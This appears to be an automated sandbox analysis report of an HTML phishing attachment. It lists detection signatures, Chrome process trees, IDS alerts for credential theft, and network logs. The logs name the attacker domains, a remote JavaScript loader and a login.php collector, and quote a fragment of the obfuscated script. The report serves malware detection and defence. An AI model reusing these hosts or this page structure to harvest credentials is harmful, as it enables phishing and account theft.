Edit tour

Windows Analysis Report
Play_VM-Now_offshorerenewablesVWAV.htm

Overview

General Information

Sample name:	Play_VM-Now_offshorerenewablesVWAV.htm
Analysis ID:	1623209
MD5:	1d3ec5c869a3f157228eed9fde99db4c
SHA1:	adc76c70a4edc83a9b1ab5bcd028ff2f208f8b69
SHA256:	709a3198b91a744609f39cdac7e287edc4f5f69fbc0ee59db8c7b058c7b86038
Infos:

Detection

HTMLPhisher

Score:	96
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

Yara detected HtmlPhish10

Detected javascript redirector / loader

HTML IFrame injector detected

HTML Script injector detected

HTML document with suspicious name

HTML document with suspicious title

HTML file submission containing password form

HTML page contains obfuscated javascript

Suspicious Javascript code found in HTML file

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden javascript code

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Invalid 'forgot password' link found

No HTML title found

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w11x64_office

chrome.exe (PID: 3412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Play_VM-Now_offshorerenewablesVWAV.htm" MD5: 290DF23002E9B52249B5549F0C668A86)

chrome.exe (PID: 6872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1892,i,17513973682476257831,12935232604443765362,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=2140 /prefetch:11 MD5: 290DF23002E9B52249B5549F0C668A86)

chrome.exe (PID: 6552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --string-annotations=is-enterprise-managed=no --field-trial-handle=5124,i,17513973682476257831,12935232604443765362,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=6008 /prefetch:12 MD5: 290DF23002E9B52249B5549F0C668A86)

chrome.exe (PID: 5072 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --string-annotations=is-enterprise-managed=no --field-trial-handle=4308,i,17513973682476257831,12935232604443765362,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=1652 /prefetch:14 MD5: 290DF23002E9B52249B5549F0C668A86)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
1.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Suricata Signatures

ETPRO PHISHING Successful Generic Phish 2021-03-25

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T02:20:35.924224+0100	2847819	1	Successful Credential Theft Detected	192.168.2.24	54007	63.250.38.198	443	TCP
2025-02-25T02:21:01.035303+0100	2847819	1	Successful Credential Theft Detected	192.168.2.24	54604	63.250.38.198	443	TCP
2025-02-25T02:21:23.779591+0100	2847819	1	Successful Credential Theft Detected	192.168.2.24	54608	63.250.38.198	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://pxvbtech.store/xtk/xls/x1t2k.js	Avira URL Cloud: Label: malware
Source: https://pxvbtech.store/xtk/xls/login.php	Avira URL Cloud: Label: malware

Phishing

Yara detected HtmlPhish10

Source: Yara match	File source: 1.6.pages.csv, type: HTML
Source: Yara match	File source: 1.4.pages.csv, type: HTML
Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.5.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML

Detected javascript redirector / loader

Source: Play_VM-Now_offshorerenewablesVWAV.htm

HTTP Parser: Low number of body elements: 0

HTML IFrame injector detected

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm

HTTP Parser: New IFrame

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: New script, src: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: New script, src: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: New script, src: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: New script, src: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: New script, src: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm

Tab title: Play_VM-Now_offshorerenewablesVWAV.htm

HTML page contains obfuscated javascript

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm

HTTP Parser: (function(_0x2a8bb1,_0x3065a0){function _0xc27043(_0x170223,_0x45126c,_0x476351,_0x58ad66,_

Suspicious Javascript code found in HTML file

Source: Play_VM-Now_offshorerenewablesVWAV.htm

HTTP Parser: document.write

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: Play_VM-Now_offshorerenewablesVWAV.htm

HTTP Parser: Base64 decoded: h<?_'g09!BZQ](r!!Z5C?G.w8P\?]Z>Qn(=;[7,j17X]N1,(U.+;(1i+[+Q'3Zc0h;/]3_]+$77bO)]/[((9T[4/8,G=]z`$7'Cr"B\'X/%U9q;+H>\"0Y{1;,(U.,5#;CZ54J,8PG,){%+w0<T*'$(%8Ca;(]3bX...

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm

HTTP Parser: Invalid link: Forgot Password?

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: HTML title missing

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm

HTTP Parser: <input type="password" .../> found

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	HTTP Parser: No <meta name="copyright".. found

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.24:54604 -> 63.250.38.198:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.24:54608 -> 63.250.38.198:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.24:54007 -> 63.250.38.198:443

Source: global traffic

TCP traffic: 192.168.2.24:54004 -> 185.174.100.76:8162

Source: global traffic

TCP traffic: 192.168.2.24:54598 -> 162.159.36.2:53

Source: global traffic

HTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1740446390074&w=0&anoncknm=al_app_anon&NoResponseBody=true HTTP/1.1Accept-Encoding: gzip, deflateContent-Length: 2744Content-Type: application/json; charset=UTF-8Host: browser.events.data.msn.cnConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 199.232.196.193 199.232.196.193
Source: Joe Sandbox View	IP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox View	IP Address: 151.101.130.137 151.101.130.137

Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 216.58.206.67
Source: unknown	TCP traffic detected without corresponding DNS query: 216.58.206.67
Source: unknown	TCP traffic detected without corresponding DNS query: 216.58.206.67
Source: unknown	TCP traffic detected without corresponding DNS query: 216.58.206.67
Source: unknown	TCP traffic detected without corresponding DNS query: 95.100.70.200
Source: unknown	TCP traffic detected without corresponding DNS query: 95.100.70.200
Source: unknown	TCP traffic detected without corresponding DNS query: 95.100.70.200
Source: unknown	TCP traffic detected without corresponding DNS query: 95.100.70.200
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.209.40
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.209.40
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.209.40
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.209.40
Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 2.21.65.132
Source: unknown	TCP traffic detected without corresponding DNS query: 216.58.206.67
Source: unknown	TCP traffic detected without corresponding DNS query: 216.58.206.67
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xtk/xls/x1t2k.js HTTP/1.1Host: pxvbtech.storeConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: linxcoded.storeConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xtk/xls/x1t2k.js HTTP/1.1Host: pxvbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xtk/xls/login.php HTTP/1.1Host: pxvbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xtk/xls/login.php HTTP/1.1Host: pxvbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=p6lhn72dengna2mli0cmeele5p
Source: global traffic	HTTP traffic detected: GET /xtk/xls/login.php HTTP/1.1Host: pxvbtech.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=p6lhn72dengna2mli0cmeele5p
Source: global traffic	HTTP traffic detected: GET /r/r1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: browser.events.data.msn.cn
Source: global traffic	DNS traffic detected: DNS query: pxvbtech.store
Source: global traffic	DNS traffic detected: DNS query: linxcoded.store
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: i.imgur.com
Source: global traffic	DNS traffic detected: DNS query: server1.linxcoded.store
Source: global traffic	DNS traffic detected: DNS query: _8162._https.server1.linxcoded.store
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa

Source: unknown

Source: chromecache_78.1.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: chromecache_81.1.dr, chromecache_78.1.dr	String found in binary or memory: https://api.ipify.org?format=json
Source: chromecache_81.1.dr, chromecache_78.1.dr	String found in binary or memory: https://code.jquery.com/jquery-3.1.1.min.js
Source: chromecache_76.1.dr	String found in binary or memory: https://getbootstrap.com)
Source: chromecache_76.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53966
Source: unknown	Network traffic detected: HTTP traffic on port 53992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54611
Source: unknown	Network traffic detected: HTTP traffic on port 53957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53979
Source: unknown	Network traffic detected: HTTP traffic on port 53993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53971
Source: unknown	Network traffic detected: HTTP traffic on port 53966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53976
Source: unknown	Network traffic detected: HTTP traffic on port 54611 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53974
Source: unknown	Network traffic detected: HTTP traffic on port 53983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53987
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53986
Source: unknown	Network traffic detected: HTTP traffic on port 53959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54604 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54607
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54606
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54604
Source: unknown	Network traffic detected: HTTP traffic on port 53974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54608
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53992
Source: unknown	Network traffic detected: HTTP traffic on port 53964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54603
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54006
Source: unknown	Network traffic detected: HTTP traffic on port 53958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54607 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54603 -> 443

System Summary

HTML document with suspicious name

Source: Name includes: Play_VM-Now_offshorerenewablesVWAV.htm

Initial sample: play

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir3412_2085043222

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir3412_2085043222

Jump to behavior

Source: classification engine

Classification label: mal96.phis.winHTM@24/26@26/9

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Play_VM-Now_offshorerenewablesVWAV.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1892,i,17513973682476257831,12935232604443765362,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=2140 /prefetch:11
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --string-annotations=is-enterprise-managed=no --field-trial-handle=5124,i,17513973682476257831,12935232604443765362,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=6008 /prefetch:12
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --string-annotations=is-enterprise-managed=no --field-trial-handle=4308,i,17513973682476257831,12935232604443765362,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=1652 /prefetch:14
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1892,i,17513973682476257831,12935232604443765362,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=2140 /prefetch:11	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
